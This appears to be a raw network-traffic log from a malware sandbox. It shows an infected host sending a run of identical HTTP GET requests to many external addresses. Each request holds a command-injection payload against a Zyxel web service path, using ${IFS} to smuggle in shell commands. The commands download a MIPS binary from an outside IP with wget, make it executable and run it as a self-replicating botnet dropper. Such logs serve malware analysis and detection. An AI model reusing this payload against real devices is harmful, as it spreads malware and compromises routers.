                                                        Jan 28, 2024 10:12:54.423065901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4753192.168.2.1445158111.77.86.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423115015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4754192.168.2.1440560213.156.31.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423146009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4755192.168.2.1448156174.242.54.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423183918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4756192.168.2.145829493.248.93.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423227072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4757192.168.2.144630247.62.220.34443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423264027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4758192.168.2.1458614217.30.203.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423305035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4759192.168.2.1452368118.67.142.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423343897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4760192.168.2.144677884.195.229.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423365116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4761192.168.2.14503088.245.139.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423412085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4762192.168.2.1440226205.105.115.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423437119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4763192.168.2.143359245.112.249.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423465967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4764192.168.2.1435500203.66.24.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423537016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4765192.168.2.145333859.164.56.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423563004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4766192.168.2.1438760114.39.177.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423594952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4767192.168.2.14372104.119.61.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423641920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4768192.168.2.1433280183.155.14.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423680067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4769192.168.2.143972671.46.191.243443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423722982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4770192.168.2.144160418.81.155.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423736095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4771192.168.2.1445712203.169.134.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423769951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4772192.168.2.144826684.252.160.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423835039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4773192.168.2.143325014.145.50.46443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423861027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4774192.168.2.145920465.198.244.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423892975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4775192.168.2.1441774171.29.198.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423929930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4776192.168.2.1435344144.47.26.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423953056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4777192.168.2.1460322167.238.180.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.423984051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4778192.168.2.1448772220.143.30.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424042940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4779192.168.2.1453876190.135.99.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424062967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4780192.168.2.1442956103.100.90.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424118042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4781192.168.2.1451600125.187.23.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424164057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4782192.168.2.144124299.1.24.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424195051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4783192.168.2.145058252.252.112.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424227953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4784192.168.2.1459476174.216.218.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424283981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4785192.168.2.1450476194.213.10.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424314976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4786192.168.2.1433388148.131.254.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424360037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4787192.168.2.1448306193.240.40.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424384117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4788192.168.2.1454402101.173.165.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424428940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4789192.168.2.1446408129.228.51.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424484968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4790192.168.2.1446122204.76.140.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424514055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4791192.168.2.1453446195.202.60.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424544096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4792192.168.2.1457762168.157.182.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424588919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4793192.168.2.1442256184.148.85.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424627066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4794192.168.2.143691887.43.91.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424665928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4795192.168.2.145390643.61.161.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424705982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4796192.168.2.144758094.214.155.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424746990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4797192.168.2.1433610133.233.11.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424793959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4798192.168.2.1459492116.44.76.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424829006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4799192.168.2.1440874144.253.28.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424871922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4800192.168.2.1437436155.235.104.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424906969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4801192.168.2.1451092187.106.234.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424967051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4802192.168.2.145348685.22.13.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.424998045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4803192.168.2.1444394174.107.93.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.425030947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4804192.168.2.143978294.17.115.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.425060034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4805192.168.2.143749444.131.31.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.425098896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4806192.168.2.1440304178.254.195.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.425148010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4807192.168.2.146032258.31.133.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.425173044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4808192.168.2.1447088180.83.50.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.425220013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4809192.168.2.1444338124.162.205.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.425254107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4810192.168.2.1457374212.174.163.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.425302982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4811192.168.2.144946295.87.229.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.425328016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4812192.168.2.1435052162.230.52.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:54.425359964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4813192.168.2.1443368196.221.173.47443
                                                        TimestampBytes transferredDirectionData
